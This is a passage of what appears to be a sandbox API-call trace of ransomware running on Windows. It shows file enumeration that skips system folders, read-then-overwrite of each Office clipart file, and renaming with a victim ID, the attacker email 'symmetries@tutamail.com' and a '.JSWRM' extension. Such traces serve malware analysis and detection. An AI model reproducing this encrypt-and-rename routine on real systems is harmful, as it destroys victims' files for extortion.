[0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.410] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2788) returned 1 [0095.410] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xae0) returned 0x23fc98 [0095.410] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xae0, lpOverlapped=0x0) returned 1 [0095.411] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.411] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xae0, lpOverlapped=0x0) returned 1 [0095.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0095.411] CloseHandle (hObject=0x314) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0095.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0095.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0095.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0095.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0095.412] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.412] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.413] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00452_.WMF", cAlternateFileName="")) returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2=".") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="..") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="...") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="windows") returned -1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="recovery") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="perflogs") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="documents and settings") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="system volume information") returned -1 [0095.413] lstrcmpiW (lpString1="SL00452_.WMF", lpString2="msocache") returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00452_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00452_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00452_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0095.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0095.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.413] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0095.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.414] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1344) returned 1 [0095.414] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x540) returned 0x234408 [0095.414] ReadFile (in: hFile=0x314, lpBuffer=0x234408, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesRead=0x345e89c*=0x540, lpOverlapped=0x0) returned 1 [0095.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.415] WriteFile (in: hFile=0x314, lpBuffer=0x234408*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesWritten=0x345e898*=0x540, lpOverlapped=0x0) returned 1 [0095.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234408 | out: hHeap=0x1e0000) returned 1 [0095.416] CloseHandle (hObject=0x314) returned 1 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0095.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0095.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0095.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0095.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.416] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0095.417] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL00712_.WMF", cAlternateFileName="")) returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2=".") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="..") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="...") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="windows") returned -1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="recovery") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="perflogs") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="documents and settings") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="system volume information") returned -1 [0095.417] lstrcmpiW (lpString1="SL00712_.WMF", lpString2="msocache") returned 1 [0095.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00712_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00712_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00712_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0095.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00712_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL00712_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL00712_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0095.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.418] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7608) returned 1 [0095.418] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1db0) returned 0x205850 [0095.418] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1db0, lpOverlapped=0x0) returned 1 [0095.452] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.452] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1db0, lpOverlapped=0x0) returned 1 [0095.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0095.452] CloseHandle (hObject=0x314) returned 1 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0095.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0095.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0095.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0095.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0095.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0095.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0095.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0095.453] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.454] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102ed99a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102ed99a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102ed99a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcdc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SL01040_.WMF", cAlternateFileName="")) returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2=".") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="..") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="...") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="windows") returned -1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="recovery") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="perflogs") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="documents and settings") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="system volume information") returned -1 [0095.454] lstrcmpiW (lpString1="SL01040_.WMF", lpString2="msocache") returned 1 [0095.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01040_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01040_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01040_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01040_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SL01040_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SL01040_.WMF", lpUsedDefaultChar=0x0) returned 12 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.455] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3292) returned 1 [0095.455] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd0) returned 0x23fc98 [0095.455] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0095.457] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.457] WriteFile 